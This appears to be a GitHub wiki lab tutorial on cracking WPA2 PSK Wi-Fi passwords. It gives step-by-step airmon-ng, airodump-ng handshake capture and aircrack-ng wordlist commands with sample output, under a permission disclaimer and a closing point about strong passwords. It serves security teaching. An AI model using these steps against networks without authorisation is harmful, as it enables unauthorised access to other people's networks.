-
Notifications
You must be signed in to change notification settings - Fork 0
Cracking WPA2 PSK
I am not a lawyer. I am definitely not your lawyer.
Only apply the techniques described below to networks you own or have explicit (written) permission to perform WiFi security assessment techniques upon.
It is your responsibility to familiarize yourself with applicable laws before performing any/all of the techniques below. I am not responsible for your actions.
WPA2 PSK is probably the most commonly deployed protocols used to secure wireless networks. It was designed and intended for use in homes and small offices. PSK stands for Pre-Shared Key. The pre-shared key is a shared secret that everyone who connects to the network must use. The pre-shared key is usually between 8 and 63 characters in length.
WPA2 PSK is vulnerable to password cracking attacks if default or weak passwords/pass phrases are used. The techniques described below are an example of exploiting this common weakness.
We will be using the following tools during the course of this exercise:
- iwconfig (Used to inspect the available wireless network interfaces)
- iwlist (Used to obtain a list the available wireless networks [and their associated details] in your area)
- aircrack-ng (Used to capture and crack the pre-shared key)
I recommend using Kali Linux because all of these tools are pre-installed.
In order to capture (and crack) the pre-shared key you will need a wireless adapter that can be placed in 'monitor' mode. Most wireless adapters operate in 'managed' mode, this means that it acts as a client that connects to an access point (which operates in 'master' mode). 'Monitor' mode enables a wireless adapter to capture packets without first associating with a network. Not all drivers for wireless adapters support placing them into 'monitor' mode. Chances are that it is unlikely that your preinstalled WiFi adapter cannot be easily placed into 'monitor' mode. Look here to find wireless adapters whose drivers support 'monitor' mode.
Note: You must run the following commands with root privileges.
# iwconfig
This should generate output similar to the following:
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
lo no wireless extensions.
'wlan0' is probably your primary wireless adapter. If you have attached an external wireless adapter (for example one known to be capable of being placed into 'monitor' mode), then you may want to use wlan1 for this exercise.
Run the following command:
# iwlist <wireless adapter> scanning
This should generate output similar to the following:
wlan0 Scan completed :
Cell 05 - Address: F4:63:49:27:E8:B5
Channel:1
Frequency:2.412 GHz (Channel 1)
Quality=70/70 Signal level=-27 dBm
Encryption key:on
ESSID:"wireless-lab"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=00000009ccd85bbc
Extra: Last beacon: 32ms ago
IE: Unknown: 0012537072696E7457694669612D323745384234
IE: Unknown: 010882848B960C121824
IE: Unknown: 030101
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: 2D1A2C101EFF00000000000000000000000000000000000000000000
IE: Unknown: 3D1601000000000000000000000000000000000000000000
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : TKIP CCMP
Authentication Suites (1) : PSK
IE: Unknown: DD180050F2020101000003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C332C101EFF00000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C3401000000000000000000000000000000000000000000
IE: Unknown: DD0600E04C020160
In order to target a wireless network, you should note the the Address, ESSID, and channel associated with that network.
Run the following command:
# airmon-ng start <wireless adapter>
This should generate output similar to the following:
PHY Interface Driver Chipset
phy1 wlan0 rt2800usb Ralink Technology, Corp. RT5370
(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
(mac80211 station mode vif disabled for [phy1]wlan0)
Hopefully, this will place the specified wireless adapter into 'monitor' mode. You can check your adapters again using 'iwconfig', you should see that your specified wireless adapter now has a 'mon' appended to it.
With your wireless adapter now in 'monitor' mode, run the following command:
# airodump-ng <wireless adapter in monitor mode> --bssid <target network address> --channel <target network channel> --write <output file name>
You want to wait until airodump-ng has captured a four-way handshake (which occurs when a client device connects to an access point). It should look similar to the following:
CH 1 ][ Elapsed: 2 mins ][ 2017-12-05 18:59 ][ WPA handshake: 14:91:82:FF:FF:FF
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:FF:FF:FF -36 100 1654 497 2 1 54e. WPA2 CCMP PSK wireless-lab
BSSID STATION PWR Rate Lost Frames Probe
14:91:82:FF:FF:FF 9C:FC:01:5C:32:C8 -54 0e-24 0 501
Once airodump-ng has captured a four-way handshake, then you can press 'Cntrl-C' to terminate the capture.
Now we will use aircrack-ng to crack the pre-shared key. In order to do this we need a list of common passwords. I recommend using the '/usr/share/wordlist/rockyou.txt.gz' wordlist. If you use this wordlist, then copy and decompress it with the following commands:
# cp /usr/share/wordlist/rockyou.txt.gz .
# gzip -d rockyou.txt.gz
Then run aircrack-ng to crack the pre-shared key with the following command:
# aircrack-ng <capture output file> -w rockyou.txt (or another wordlist)
This should generate output similar to the following:
Aircrack-ng 1.2 rc4
[00:00:00] 232/233 keys tested (1992.58 k/s)
Time left: 0 seconds 99.57%
KEY FOUND! [ biscotte ]
Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE
Transient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD
EAPOL HMAC : 28 A8 C8 95 B7 17 E5 72 27 B6 A7 EE E3 E5 34 45
The line with 'KEY FOUND!' shows the pre-shared key.
Nothing teaches like doing it yourself. Please use the steps/techniques above to crack my wireless lab. I grant you permission to utilize the techniques above on my wireless lab access point.
The network name is: wireless-lab
The point of this lab is to recognize how critical it is to use strong passwords to secure your WPA2 PSK wireless networks.
Happy Hacking!